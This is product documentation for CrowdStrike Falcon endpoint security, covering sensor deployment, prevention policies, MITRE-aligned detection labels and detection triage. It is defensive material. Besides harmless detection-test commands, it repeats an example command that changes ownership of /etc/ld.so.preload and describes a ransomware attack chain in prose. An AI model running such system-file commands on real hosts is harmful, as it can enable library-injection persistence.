Endpoint Security

Monitor and protect your endpoints.

Endpoint Security provides a comprehensive cybersecurity approach to protect endpoints such as desktops, laptops, and mobile devices from malicious activities. It includes an endpoint protection platform (EPP) that detects and prevents security threats, offers investigation and remediation capabilities, and leverages advanced analytics to monitor network activity for indicators of compromise. The solution can be managed through a centralized console, supporting on-premises, cloud, or hybrid environments to ensure consistent security across all devices.

Endpoint Security: Create and manage prevention policies, exclusions, and custom IOCs and IOAs to control what activity is blocked, killed, quarantined, and allowed on your hosts.
Falcon Firewall Management: Centrally manage the firewalls on your Windows, macOS, and Linux hosts in the Falcon console.
Falcon Forensics: Collect forensic triage data from workstations and servers within your environment to perform incident response investigations, compromise assessments, and threat hunting.
On-Demand Scanning: Create on-demand scans that detect and quarantine portable executable (PE) files that contain dormant malware before they execute on Windows hosts
Real Time Response: Connect to and run commands on hosts from the Falcon console, enabling incident response and remediation.
USB Device Control: Create device policies to gain visibility into and control over devices in your environment.
Zero Trust Assessment: Better understand the security posture of your organization's hosts through a granular assessment of their Operating System and sensor settings.

Start Up and Scale Up

Understand the basics of Falcon endpoint security, and what it takes to get it running.

About the Falcon platform

What is Falcon?

CrowdStrike Falcon is a SaaS-based, next generation endpoint protection solution that provides advanced detection, prevention, monitoring and search capabilities, allowing analysts to defend against sophisticated threats and adversaries.

Falcon offers remote visibility across endpoints throughout an environment, enabling instant access to the "who, what, when, where, and how" of an attack. We collect and analyze more than 80 billion endpoint events each day from millions of sensors deployed across 176 countries. Falcon can help you protect your endpoints, whether you have just a few or hundreds of thousands.

How does Falcon work?

Falcon consists of two components: the sensor and the cloud.

First, a lightweight sensor is deployed to every endpoint where it gathers appropriate system events from each host and takes proactive detection and prevention actions. The Falcon sensor detects and defends against attacks occurring on disk and in memory. The platform continuously watches for suspicious processes, events, and activities, wherever they reside. Falcon also provides advanced prevention capabilities like custom allowing and blocking, malware blocking, exploit blocking, and IOA-based prevention (Indicators of Attack).

Data gathered by the sensor is then transmitted continuously from the sensor to CrowdStrike’s Advanced Threat Intelligence Cloud, where CrowdStrike analyzes and draws links between events across the entire Falcon sensor community. These behavioral patterns are detected in real time using CrowdStrike’s Threat Graph data model, allowing analysts to detect new attacks, whether the attacks use malware or not.

CrowdStrike provides you a suite of powerful investigation, prevention, detection, and sensor monitoring tools in the Falcon web interface—your command center for everything to do with Falcon. See the Falcon Console User Guide for an app-by-app walkthrough.

What detection capabilities does Falcon have?

For known threats, Falcon provides cloud-based antivirus (Cloud AV) and Indicators of Compromise (IOC) detection capabilities. For unknown and zero-day threats, Falcon applies IOA detection, using machine learning techniques to build predictive models that can detect never-before-seen malicious activities with high accuracy. Driven by CrowdStrike’s Threat Graph data model, this IOA analysis recognizes behavioral patterns to detect new attacks.

What is the Falcon sensor?

The sensor takes only minutes to deploy to your endpoints, and analysts monitor and manage the environment through the Falcon web interface, a powerful web portal. With Falcon, there are no controllers to be installed, configured, updated or maintained. There is no on-premises equipment. Falcon is a 100% cloud-based solution, offering Security as a Service to users.

Does the sensor integrate with SIEM technology?

CrowdStrike sends events from the sensor to Falcon Next-Gen SIEM, bringing together threat detection, investigation, and response in one platform. For more info, see Next-Gen SIEM.

In addition, CrowdStrike provides the Falcon SIEM Connector which allows you to send detections and audit events to your SIEM. The Falcon SIEM Connector integrates with HP ArcSight, IBM QRadar, and Splunk. Additionally, CrowdStrike offers the Streaming API to enable integration with third-party SIEMs. For more information, see SIEM Connector and Non-Sensor Events Reference.

What operating systems does Falcon support?

For the most up to date list of supported operating systems, see the Deployment Guides:

Falcon Sensor for Windows
Falcon Sensor for Mac
Falcon Sensor for Linux
Deploying Falcon for Mobile to iOS devices
Deploying Falcon for Mobile to Android devices

What data does Falcon send to the cloud?

The Falcon platform is designed to maximize visibility into real-time and historical endpoint security events by gathering the event data necessary to identify, understand, and respond to attacks — but nothing more. The amount of data that a sensor transmits to the cloud varies depending on each host’s activity.

This default set of system events is focused on process execution and is continually monitored for suspicious activity. When such activity is detected, additional data collection activities are initiated to better understand the situation and enable a timely response to the event. The specific data collected changes as CrowdStrike advances capabilities and in response to changes in the threat landscape.

How does Falcon safeguard customer data?

CrowdStrike uses a TLS-encrypted tunnel to send data between the sensor and the cloud.

Additionally, CrowdStrike uses certificate pinning on the sensor side. This means that a sensor only communicates with cloud endpoints that have a known certificate. CrowdStrike also provides you the ability to allow our cloud endpoints in your firewalls to ensure that your Falcon sensors only communicate with CrowdStrike.

Next, every customer is assigned a unique customer ID. Because CrowdStrike tags customer data with a unique customer ID, any query or exchange of data is limited to the scope of a specific customer ID, which further secures data.

All data in the CrowdStrike cloud, including backups, are encrypted with industry-standard AES256 encryption.

CrowdStrike also limits employee access to customer data to individuals with a business need. This includes Customer Support and Falcon Overwatch. Moreover, direct access to underlying systems is limited only to engineers with a business need. Access is protected by encrypted VPN and multi-factor authentication.

Getting Falcon up and running

This high-level walkthrough guides you through a basic Falcon implementation for Windows, Mac, and Linux endpoints, from installing your first sensor to scaling up to your whole environment. For information about iOS and Android endpoint protection, see Deploying Falcon for Mobile to iOS devices and Deploying Falcon for Mobile to Android devices.

Before you begin

We recommend using Falcon as your only AV solution. Running more than one AV solution can cause unexpected results.
Have two devices:
- A test device running Windows. You'll install the Falcon sensor on this device. For general use, Falcon also supports Mac and Linux devices.
- A management device with Google Chrome. This device is used to access the Falcon console.
Set up your Falcon account, including two-factor authentication (2FA), using the link in your activation email.

Download and install the sensor

The Falcon sensor is a lightweight agent that you install on each device. When a device has a Falcon sensor installed, we call that device a host. Each sensor detects and prevents malicious activity on a host, according to the policies that you’ll configure later. You use the Falcon console to manage your hosts.

In this example process, download and manually install the Falcon sensor on your test device.

1. Download and run the sensor installer

Download and run the installer file for your test device’s operating system per these procedures.

Windows: Manual installation
Mac:
- Recommended installation method: Using an MDM to sync profiles
- Alternative installation method: Installing without using an MDM to sync profiles
Linux: Deploy the Falcon sensor for Linux

2. Verify the sensor is running

Windows: Verifying sensor installation
Mac: Verifying sensor installation
Linux: Verifying sensor installation

3. Scale up

Learn about deploying at scale, using tools like SCCM or JAMF, configuring images for cloning, and more from our full deployment guides:

Falcon Sensor for Windows
Falcon sensor for Mac
Falcon Sensor for Linux

Set up a host group

Groups are collections of hosts in your organization. Using groups, you can control endpoint protection and sensor upgrades for each of your hosts. For example, you might create separate groups for servers, general users' devices, and your executives' devices.

In this example, create a group and assign your host by platform.

1. Create a host group

In the Falcon console, go to Host groups (Host setup and management > Manage endpoints > Host groups).
Click Add New Group in the upper-right corner.
Enter a name and an optional description.
Select Dynamic as your group type. This means the group automatically adds new hosts when they match the group's assignment rule.

2. Put a host in the group

In your host group’s details:

Click Edit near Assignment rule.
In the OS Version column of the filter bar, select your host’s operating system. When you do, the host is added to the list of Hosts for this group.
Click Save in the upper-right corner.

3. Scale up

Host groups are essential when your environment has dozens (to hundreds of thousands) of hosts. Read Host and Host Group Management for information about:

Assigning hosts to dynamic groups using other attributes, such as their Organizational Unit (OU) in Active Directory
Assigning hosts to static groups by manually selecting them

Use host groups to keep your hosts running up-to-date sensor versions. Read Sensor Update Policies for more information.

Review the default prevention policy

Prevention policies are sets of rules that control how Falcon responds to potentially malicious activity identified by your sensors.

1. Go to the Default Policy

When you created your group, Falcon automatically assigned it to use the Default Policy, which is detection only. Review the default policy using the Falcon console:

Go to Prevention Policies (Endpoint security > Configure > Prevention policies).
Click Default Policy.

You can examine the controls in the Default Policy to understand its settings. Later, you can create your own policies to be as cautious or as aggressive as your environment requires.

2. Scale up

When you have many groups, you want more fine-tuned control over the detections and preventions triggered on your hosts. This introductory guide shows you how to start small with Falcon, but Falcon can detect and prevent much more sophisticated attacks on all the endpoints in your environment. Read Detection and Prevention Policies for more information about configuring prevention policies and custom detection and prevention settings:

File Exclusions
Prevention Hashes
Custom IOA Rules

Watch the sensor detect an event

Falcon sensors detect malicious activity, respond according to your policies, and report the activity to the CrowdStrike Cloud. You can see information on this malicious activity in the Falcon console.

1. Run a simulated attack

To see an example of what a detection looks like, run a simulated but harmless attack on your host:

Open a command prompt.
Run each applicable command:
- Windows:
  - cmd crowdstrike_test_critical
  - cmd crowdstrike_test_high
  - cmd crowdstrike_test_medium
  - cmd crowdstrike_test_low
  - cmd crowdstrike_test_informational
- macOS and Linux:
  - For most shell environments, use these commands:
    - sh -c crowdstrike_test_critical
    - sh -c crowdstrike_test_high
    - sh -c crowdstrike_test_medium
    - sh -c crowdstrike_test_low
    - sh -c crowdstrike_test_informational
    Note: If you see the error crowdstrike_test_high: not found, you can safely ignore it. This is expected behavior and does not affect the test detection being triggered.
  - For the dash shell environment, or if the sh -c commands don't work in your environment, use these commands:
    - bash crowdstrike_test_critical
    - bash crowdstrike_test_high
    - bash crowdstrike_test_medium
    - bash crowdstrike_test_low
    - bash crowdstrike_test_informational
    Note: If you see the error crowdstrike_test_high: No such file or directory, you can safely ignore it. This is expected behavior and does not affect the test detection being triggered.

2. View the detection

Return to the Falcon console on your management device to see that the Falcon sensor detected this attack.

Go to Endpoint detections (Endpoint security > Monitor > Endpoint detections) on your management device.
Click the line item for the detection you triggered.

Review a summary of the event and investigate the sequence of events on your host that led to the attack.

3. Scale up

You can also simulate a unique, non-malicious ransomware over SMB attack, to help prevent future attacks. For more info, see Demonstrate File System Containment With a Simulated Ransomware Attack.

Read About Endpoint Monitoring for more about understanding the detections and preventions in your environment.

Read Falcon Notifications to learn about the options available to have Falcon let you and other members of your organization know about things like incidents, detections, policy changes, and more. This is helpful for staying up to date even when you're not logged into the Falcon console.

More info

Visit the CrowdStrike Customer Center. For US-GOV-1 and US-GOV-2 customers, visit the CrowdStrike Government Customer Center to submit questions and find more info.
Sign up for our alert system. For US-GOV-1 and US-GOV-2 customers, go to the Sign up for our alert system to receive critical updates. We'll notify you by email or SMS to inform you of new product releases, upcoming features, and status updates on our cloud services.
Watch videos, read data sheets, and view webinars in our Resource Center.
Learn about adversaries that might threaten your organization or industry from our Intelligence profiles.

MITRE-Based Falcon Detections Framework

Learn about how CrowdStrike labels detections in alignment with the MITRE ATT&CK matrix and Falcon Detection Methods.

Overview

CrowdStrike is aligned with MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) matrix to label our detections and related supporting events. ATT&CK is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. ATT&CK is useful for understanding security risks against known adversary behavior, planning security improvements, and verifying that defenses work as expected.

About objective, tactic, technique, sub-technique, and description

We label each detection and related supporting event with a tactic and technique/sub-technique combination, characterizing and describing what the adversary is trying to do and what they’re using to do it. We also include additions that build on ATT&CK.

Our Objective layer: Groups related tactics, making them easier to learn and remember.
- Gain access -- Initial Access, Credential Access, Privilege Escalation
- Keep access -- Persistence, Defense Evasion
- Explore -- Discovery, Lateral Movement
- Contact controlled systems -- Command and Control
- Follow through (basically, steal and break things) -- Collection, Exfiltration, Execution, Impact
- Network-based effects -- Network Effects, Remote Service Effects
Our detection description: Even more specific than technique/sub-technique, it states what triggered that detection, explains why it’s considered a problem, and suggests how to start investigating.
Tactic, technique, and sub-technique align with the MITRE ATT&CK Framework. In the Falcon console, technique and sub-technique are used interchangeably. Sub-techniques are displayed in place of technique when applicable.

Together they provide this comprehensive view:

The adversary is trying to <objective> by <tactic> using <technique/sub-technique>.
<Activity> happened.
Possibly <intent>.
Start investigating by <action>.

For example:

The adversary is trying to keep access by defense evasion using process hollowing.
A system process appears to have been hijacked by malware, likely through injection or hollowing.
The process will likely attempt to contact external infrastructure or download a malicious payload.
Investigate the process tree.

About the Falcon Detection Methods matrices

Falcon can detect and prevent activities that don’t map directly to the ATT&CK matrix, so we created the Falcon Detection Methods (FDM) matrix to provide useful information for them. The FDM tactics and techniques highlight behavior that we consider suspicious and malicious, and worth investigating. It’s not an exact parallel to ATT&CK, but we keep that structure to match workflows with the ATT&CK-aligned detections.

Most closely aligned are the Malware, Exploit, and Post-Exploit tactics and techniques. They’re areas that MITRE doesn’t yet include in the ATT&CK matrix.

Malware -- Broad category for all software intended to cause harm, and can be identified and prevented based on its hash or file.
Exploit -- Exploit Mitigation
Post-Exploit -- Malicious Tool Delivery, Malicious Tool Execution, Command-Line Interface

The others reflect how CrowdStrike Falcon detects activities.

Machine Learning -- Detected by our next-gen antivirus/anti-malware solution, controlled by settings in Endpoint security > Configure > Prevention policies.
Falcon OverWatch -- For OverWatch customers. Our OverWatch team identified activity that they consider suspicious or malicious. These alerts are marked with a black falcon badge, and should always be investigated.
Falcon Intel -- For Falcon Intelligence customers. Indicates activity that matches known adversary behavior.
Custom Intelligence -- If you use our Query API to create a custom IOC, those detections have this tactic with an Indicator of Compromise technique.

Falcon Detections Methods tactics and techniques

The FDM Matrix for Enterprise covers Windows, Mac, and Linux.

Malware	Exploit	Post-Exploit	Machine Learning	Custom Intelligence	Falcon Overwatch	Falcon Intel	AI Powered IOA
Known Hash	Exploit Mitigation	Malicious Tool Delivery	Cloud-based ML	Indicator of Compromise	Suspicious Activity	Attributed to Adversary	User Execution
Destructive Malware		Malicious Tool Execution	Sensor-based ML	Indicator of Attack	Malicious Activity	Intelligence Indicator - Hash	Command and Scripting Interpreter
Malicious File		Command-Line Interface	Adware/PUP		Malicious File	Intelligence Indicator - Domain	Reflective Code Loading
Adware							Malicious File
PUP

The FDM Matrix for Mobile covers iOS and Android.

Malware	Exploit	Post-Exploit	Machine Learning	Custom Intelligence	Falcon Overwatch	Falcon Intel	Insecure Security Posture
Known Hash	Exploit Mitigation	Malicious Tool Delivery	Cloud-based ML	Indicator of Compromise	Suspicious Activity	Attributed to Adversary	Bad Device Settings
Destructive Malware		Malicious Tool Execution	Sensor-based ML	Indicator of Attack	Malicious Activity	Intelligence Indicator - Hash	Bypass Monitoring
Malicious File		Command-Line Interface	Adware/PUP		Malicious File	Intelligence Indicator - Domain
Adware						Intelligence Indicator - IP

ATT&CK Matrix for Enterprise

The full ATT&CK Matrix for Enterprise includes techniques/sub-techniques spanning Windows, Mac, and Linux platforms. For more info, see the ATT&CK Matrix for Enterprise on the MITRE site.

ATT&CK Matrix for Mobile

The full ATT&CK Matrix for Mobile includes techniques spanning iOS and Android platforms. For more info, see the ATT&CK Matrix for Mobile on the MITRE site.

Endpoint Monitoring

Understand and work through detections and incidents. Review quarantined files and remediations.

About Endpoint Monitoring

Monitor and understand your organization’s overall safety and take faster action against advanced threats on your hosts.

Overview

The Falcon console provides information to help you understand your organization’s overall safety and take faster action against advanced threats on your hosts.

Prioritize incidents for investigation. A more comprehensive approach to identifying possible attacks, incidents are made up of related detections and processes. They also include contextual detections not included in Endpoint security > Monitor > Endpoint detections .
Monitor endpoint detections to understand the processes within individual suspicious files or behaviors.
View, manage, and release quarantined files.
View the remediation actions that the Falcon platform has taken on detections.

For information about detection monitoring, see Detection Monitoring and Incident Investigation.

For information about monitoring activity in the unified detections view, see Detection Monitoring.

Requirements

Subscription: Falcon Insight XDR, Falcon for Mobile, Falcon Prevent required for preventions
Sensor support: All supported versions of Falcon sensor for macOS, Windows, and Linux
- Incidents and Detections in Endpoint Security: All supported versions of Falcon sensor for macOS, Windows, and Linux
- Mobile detections: All supported versions of the CrowdStrike Falcon apps for iOS and Android
System requirements: None
Roles: Falcon Administrator, Falcon Security Lead, Falcon Investigator, and Falcon Analyst roles have permission to manage detections and incidents. For full details about the roles required to perform specific actions on detections and incidents, see Roles for Falcon Insight Next-Gen SIEM.

Understanding the information in Endpoint detections

What’s the relationship between events, detections, and incidents?

Falcon monitors activity in your environment to identify suspicious files and behaviors. All of the collected data can be observed as events in Investigate. When a collection of events is considered noteworthy, likely because it's suspicious or malicious, the sensor triggers a detection. Adjust the detections you see through your prevention policy settings. Incidents bring together related detections, associated processes, and the connections between them to show coordinated activity you should prioritize for investigation.

Understanding incidents

Incidents are made of detections, associated processes, and the connections between them, which can include parent-child relationships, thread injections, and lateral movement. Because attacks often consist of coordinated activity happening together on one or more hosts, incidents help you see important and relevant information more quickly.

Incidents can include, or be entirely composed of, detections that aren’t shown in Endpoint security > Monitor > Endpoint detections . Though these contextual detections don’t meet a threshold of significance for all environments on their own, the context of their relationship to the rest of the incident and how noteworthy they are to your organization mean they might be key pieces of an attack.

Not all detections shown in Endpoint security > Monitor > Endpoint detections are involved in incidents.

Understanding detections

The Falcon console provides information about suspicious files and behaviors in the form of individual detections. Detections can alert you to a wide variety of activities that are occurring on your hosts, from the presence of a bad file in the form of an indicator of compromise (IOC) to a nuanced collection of suspicious behaviors in the form of an indicator of attack (IOA).

Most detections are triggered based on your prevention policy settings. If you have Falcon Prevent, your prevention policies also control which detected activities are prevented. For more info about how Falcon determines when to alert you about detections, see How detections are recorded.

MITRE-Based Falcon Detection Framework

CrowdStrike aligns with MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) matrix to label our detections. ATT&CK is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. ATT&CK is useful for understanding security risks against known adversary behavior, planning security improvements, and verifying defenses work as expected.

Tactic and technique details are provided for each Falcon detection to help you understand security risks against known adversary behavior, plan for security improvements, and verify your defenses work as expected. Our objective layer groups related tactics to make them easier to understand, remember, and visualize in the console.

The Falcon Detection Methods (FDM) matrix provides useful information about activities that don’t map directly to the ATT&CK matrix. The FDM tactics and techniques highlight behavior we consider suspicious and malicious, and worth investigating. It’s not an exact parallel to ATT&CK, but that structure is used to match workflows with the ATT&CK-aligned detections. Read more about objectives, tactics, and techniques in MITRE-Based Falcon Detections Framework.

Endpoint Detection Monitoring

In the new endpoint detections experience, monitor detections to understand the activity happening in your environment.

Overview

Monitor endpoint detections to understand the activity happening in your environment. View detailed information about suspicious processes, files, behaviors, and on-demand scan results.

Endpoint detections are also available in the unified detections view. For more info, see Detection Monitoring.

Requirements

Subscription: Falcon Insight XDR, Falcon Prevent required for preventions
Sensor support: All supported versions of Falcon sensor for macOS, Windows, and Linux
System requirements: None
Default roles: Falcon Administrator, Falcon Security Lead, Falcon Investigator, and Falcon Analyst roles have permission to manage detections. For full details about the roles required to perform specific actions on detections, see Roles for Falcon Insight Next-Gen SIEM.

Understanding endpoint detections

Note: CrowdStrike keeps detection data in the cloud for 90 days, after which some of the data gets purged from the database.

Incident involvement

If a detection is part of an incident, the detection’s Related incident attribute includes a link to the full incident.

Working through an endpoint detection

For endpoint detections on Windows, macOS, and Linux hosts, Falcon provides information in the Activity app at Endpoint security > Monitor > Endpoint detections. Multiple viewing options help you understand the actions that an adversary might be taking in your environment.

Important: Container drift detections do not appear on the Endpoint detections page. To see detected container drifts, go to Cloud security > Detections > Containers , then click Drift indicators. To review excluded container drift events, see Review excluded container drift events.

For the hosts in the cloud protected by CrowdStrike Cloud Security Posture Management (CSPM), the Activity app displays indicators of misconfiguration (IOM) revealed by cloud security posture checks. The info panel provides complete detection and visibility to all hosts, with a combination of agent-based and agentless solutions to combat security threats.

The Activity dashboard provides the information from a high-level view of your environment.

Review the Most recent detections area for a quick view of recent detections. Objective icons show the severity of the detection and whether the activity was blocked, killed, or is an OverWatch alert.
Look at the Detections by tactics graph to see the tactics identified in your environment over the past 30 days to help identify trends. Roll over the bars in the graph to see quick details.

Filter, sort, and group detections

A typical workflow in the Activity app starts on the Endpoint detections page. Go to Endpoint security > Monitor > Endpoint detections .

By default, all detections are shown and are sorted by time, from newest to oldest. Narrow down and refine your view by filtering, sorting, and grouping detections. The available options vary by detection type.

Tip: Hover over any detection row to quickly filter, sort, and group detections.

Filter: Apply one or more filters to show only the types of detections that you want to see. For example, filter the view to show only detections with a Severity value of Critical from the last hour.
Sort: Organize the visible detections by multiple criteria in ascending or descending order. For example, sort the visible detections by Time from newest to oldest.
Group: Organize the visible detections into logical groupings. For example, group detections by Host. Click a group to expand it and view the individual detections.

Tip: If you prefer an aggregated view that’s similar to the legacy endpoint detections experience, you can group detections by process tree or enable the Aggregate detections toggle. Both options produce the same detection grouping, but using the Aggregate detections toggle allows you to also group by another attribute.

Note: On-demand scan detections and other non-process detections aren’t shown when detections are grouped by process tree.

Show or hide table columns by clicking Configure table columns.

Configure detection attributes

Customize detection attributes to adjust what information appears in the list of detections, helping you triage detections more quickly and easily. For more info, see Detection Attribute Management.

View more details about a detection

Click a detection row to view the detection’s process table and summary information. The process table shows an expanded view of all processes involved in the detection and indicates which process triggered the detection. Where applicable, each indicator of suspicious behavior is presented as an associated detection.

In the summary panel, view more information about the detection in the expandable and collapsible sections. The specific sections and information shown vary by detection type and Falcon subscription. Examples of the types of information that might be shown in the summary panel:

General information about the detection and the host involved

Note: Detections from on-demand scans contain Scanned file information instead of Process information.
The commands, executables, and files involved, including an explanation of the command's behavior and effects, powered by Charlotte AI
The tactics, techniques, and objectives that were used
The associated hashes
Which prevention actions, if any, were taken
Which files were quarantined, if applicable
Network-based indicators and DNS requests
Vulnerabilities that are present on an associated host. View the host’s risk posture at a high level alongside detection-specific info. Go to view more detailed vulnerability info from Falcon Spotlight.
Misconfigurations that are present on a specific cloud-based host. Go to view more detailed vulnerability info from Cloud Security Posture Management.
CrowdStrike Intelligence indicators of compromise (IOCs), such as IP addresses, file hashes, domains, URLs, or actor IDs. These IOCs appear for first-party detections that originate from CrowdStrike, third-party detections, and detections generated by correlation rules.

In the summary view, click See full detection to view all detection details. See more detection details in multiple views:

Details: More detailed information about the detection. This view also includes a status log for the detection.
Process table: A table view of the processes associated with the detection, with the first associated process shown at the top of the table. Refine the view by showing and hiding layers. You can show and hide the legend and summary panel.
Process tree: A graph view of the processes associated with the detection. Each node in the process tree represents a process. Hover over or click a node to see additional details. Refine the view by showing and hiding layers. You can show and hide the legend and summary panel. For more info, see Process tree.
Events timeline: A list of all relevant events in chronological order. Refine the view by showing and hiding layers. You can show and hide the legend and summary panel.

Process tree

In the Process tree view, each node in the graph represents a process.

You can interact with and customize the graph in multiple ways:

View the big picture by zooming out, or view more detailed info by zooming in.
View available layers in the Legend area. Refine your view by showing or hiding layers. You can hide and show the legend.
Quickly see high-level process info by hovering over a node.
View more detailed process info by clicking a node. A process summary panel shows more info about network operations, registry operations, disk operations, command line history, and more. You can hide and show the process summary panel.
Show and hide child processes by clicking Load more and Collapse .
Refine the graph view by selecting a node and then clicking Prune to selection.
Hide all child elements of a node by selecting the parent node and then clicking Delete branches.
Undo or redo actions as needed.
Download a snapshot of the current graph view in PNG format.
Save the graph, or open a saved graph to view it in the process tree.

Process tree examples

In this simple example, a root process spawned Java executables, which eventually spawned a PowerShell executable.

A more complex example shows how you can visualize an attack and aid CrowdStrike in understanding what happened. In this example, the process tree shows a thread-injection attack that started with Outlook and was attributed to the Fancy Bear adversary.

The host user clicked a link in Outlook, which spawned Firefox, which then spawned a tab in Firefox to run an exploit through excel.exe.
Excel spawned a PowerShell instance, and then PowerShell launched csc.exe, which compiled a malicious DLL.
As indicated by the arrowed line, PowerShell then spawned notepad.exe, which injected a thread back to PowerShell. When the exploit succeeded, the attacker migrated into notepad.exe to bypass blocking.
Hiding under the Notepad process, the attacker wanted to get a better understanding of the attack target’s host and user details. They opened cmd.exe and then ran commands that enabled them to perform reconnaissance and ultimately initiate a ransomware attack through locky.exe.

Process tree example with thread injection

At this point, you can contain the host (if you have the required privileges), or assign the detection to another analyst, adding comments to ensure a smooth handoff during triage. For more info about containing hosts, see Network Containment.

Investigate a detection

You might start a detection investigation in the Process section of the detection’s summary panel. The Specific to this detection value provides information about what’s happening and, in some cases, includes suggestions for how you might respond.

Multiple options enable you to deepen your investigation or go to different contexts:

Investigate the associated host or view the host in the asset graph
Investigate an associated event
Investigate an associated hash
View a related incident
Analyze the command line with Charlotte AI for an explanation of the command's behavior and effects. Analysis shows directly within the detection.

Important: When a detection or prevention is triggered for an IOA or IOC, CrowdStrike recommends reviewing the host and process tree for events that may show additional context. Events can occur both before and after the detection that may suggest related adversary activity, such as credential access, lateral movement, data exfiltration, or file encryption. Adversaries often attempt to perform many activities on a host, so CrowdStrike recommends that your organization perform additional review and risk mitigation when detections and preventions occur.

Detections with cloud-based ML technique

Most detections occur when a process runs, but cloud-based machine learning (ML) detections can also occur when the file is written to disk. These detections include details such as the triggering file, the file path, and the hash value.

You can tell which cloud-based ML detections are detected on write because the Specific to this detection value includes this notation:

This process wrote a suspicious file to disk. That associated file meets the ML
          threshold. Review the file.

Take action on a detection

The specific actions that you can take on a detection depend on the detection type and your Falcon subscription. Examples of actions that you can take from within a detection:

Edit the detection’s status, assignment, or tags, or add a comment. Bulk editing is supported. For more info, see Endpoint detection management.
Investigate the host.
Connect to the host so you can take direct action through Falcon Real Time Response.
Limit the host’s access to the network by containing the host.
Lift file system containment.
Create an IOA exclusion.
Review quarantined files that result from detections.
Launch a hash search in Google or Falcon event search.

Monitor custom IOA detections and preventions

Detections and preventions triggered by Custom IOA rules appear in the Activity app like other CrowdStrike detections. They are distinguished by the Tactic and Technique of Custom Intelligence via Indicator of Attack. In the Execution Details of a custom IOA detection, the Custom IOA Rule field provides a link to the rule that triggered the detection.

The four events associated with the four rule types are:

CustomIOABasicProcessDetectionInfoEvent (Process Creation)
CustomIOAFileWrittenDetectionInfoEvent (File Creation)
CustomIOANetworkConnectionDetectionInfoEvent (Network Connection)
CustomIOADomainNameDetectionInfoEvent (Domain Name)

Read more about the event types that trigger custom IOA detections in Events Full Reference (Events Data Dictionary).

Investigate reconstructed commands

When Extended Command Line Visibility is enabled on a prevention policy, you can investigate reconstructed commands in several areas in the Falcon console. To enable this setting on your prevention policy, see Enable Extended Command Line Visibility.

Reconstructed commands on the Detection page
Reconstructed commands in the process table
Reconstructed commands in the process tree
Reconstructed commands in the Process Graph

Reconstructed commands on the Detection page

When the Extended Command Line Visibility policy is enabled, the process full details page shows the reconstructed command line. This example shows this reconstructed command:

sudo chgrp dummy /etc/ld.so.preload | tee temp1

To investigate:

Go to Endpoint security > Monitor > Endpoint detections .
On the Detections page, find the detection that corresponds to your reconstructed command.
Click Open menu and then click Details view.
On the Details view, scroll down to Full details to see the Reconstructed command line.

The detections view showing the reconstructed command field which is included when the Extended Command Line Visibility policy is enabled.

Reconstructed commands in the process table

When the Extended Command Line Visibility policy is enabled, the process table shows the reconstructed command line. This example shows this reconstructed command:

sudo chgrp dummy /etc/ld.so.preload | tee temp1

To investigate:

Go to Endpoint security > Monitor > Endpoint detections .
On the Detections page, find the detection that corresponds to your reconstructed command.
Click Open menu , and then click Process table.
On the process that opens, locate the Reconstructed command line.

The process table showing the reconstructed command field which is included when the Extended Command Line Visibility policy is enabled.

Reconstructed commands in the process tree

When the Extended Command Line Visibility policy is enabled, the process tree shows the reconstructed command line. This example shows this reconstructed command:

sudo chgrp dummy /etc/ld.so.preload | tee temp1

To investigate:

Go to Endpoint security > Monitor > Endpoint detections .
On the Detections page, find the detection that corresponds to your reconstructed command.
Click Open menu , and then click Process tree.
On the Execution details panel that opens, locate the Reconstructed command line.

The process tree showing the reconstructed command field which is included when the Extended Command Line Visibility policy is enabled.

Reconstructed commands in the Process Graph

When the Extended Command Line Visibility policy is enabled, the process graph shows the reconstructed command line. This example shows this reconstructed command:

To investigate:

Go to Endpoint security > Monitor > Endpoint detections .
On the Detections page, find the detection that corresponds to your reconstructed command.
Click Open menu , and then click Process graph.
On the Execution details panel that opens, locate the Reconstructed command line.

<alt: The process graph showing the reconstructed command field which is included when the Extended Command Line Visibility policy is enabled.

Endpoint detection management

You can edit a single detection or bulk-edit multiple selected detections. Change a detection’s status, change the assignee, apply tags, and add comments.

Detection assignment

Assign detections to individuals, claim the ones you’ll work on, or transfer your ownership of a detection to a colleague. Apply the Assigned to filter to see who’s working on what.

Important notes for Falcon Flight Control and multi-CID deployments:

To assign detections, you must have access to the CID where the detection was triggered and a role for viewing and assigning detections in that CID.
The list of assignable users includes anyone with access to the CID and a role with permissions for managing detections. When assigning detections from the parent CID, the list of assignable users also includes parent-level users.
For security purposes, to see a user in the assignee list, you must have access to the user’s home CID with role permissions that allow you to view users in that CID.

Detection status

Detection status info helps you understand whether detections are currently being investigated.

CrowdStrike automatically assigns a status value of New to all new detections. You can also re-apply the New status to detections as needed.

Assign these detection statuses as needed to support your organization’s detection investigations:

New
In Progress
Closed
Reopened

Detection tags

Tags can help you organize and filter your detections. Apply popular tags that are available with the Falcon platform, or create your own custom tags.

Applying the true_positive tag to detections can reveal opportunities for your team to adjust your prevention policy settings. Applying the false_positive tag to detections can help your team refine your blocklist and allowlist.

To edit the status of a detection and apply tags:

Go to Endpoint security > Endpoint detections and click Open menu .
Select Edit status.
Choose a status. You can choose either New, In progress, Reopened, or Closed.
- If you select Closed, you have the option to select one of the predefined system tags Mark as True Positive or Mark as False Positive.
- If you select New, you can click the Tags dropdown menu to see the true_positive or false_positive options.
Click Update status.

You can also filter detections by true_positive and false_positive tags. When you apply these tags, you will see an additional column called Resolution. This column gives you visibility into which detections are true positive detections, and which are false positive detections.

Notes:

You will only see the additional Resolution column if there are detections in your environment with at least one tag matching false_positive or true_positive.
If a detection has both true_positive and false_positive tags, True positive will display in the Resolution column.

The Detections page with the Resolution column highlighted.

Edit one or more detections

In the detection’s Open menu or summary panel, click Edit status.

Tip: To bulk-edit multiple detections, select the checkboxes for the detections that you want to edit, and then click Edit.
From the Status list, select a status value for the detection.
From the Assigned to list, select an assignee for the detection.
Optional. In Detection tags, apply or create tags as needed.
Optional. Add a descriptive comment.
Click Update status.

How detections are recorded

Terminology:

Agent ID (AID): Every sensor in your environment is uniquely identified by its Agent ID, or AID. If you have 5,000 sensors, you will have 5,000 unique agent IDs. Agent IDs are globally unique across all customer environments.
Customer ID (CID): Used to identify customer environments. Every environment has a unique CID.
Pattern ID: Every detection is associated with a pattern, and each pattern has a unique ID.

Falcon has rules in place so it doesn’t display redundant detections in the console or inundate users with more emails than needed:

Detections are not recorded or shown if they match an exclusion pattern.
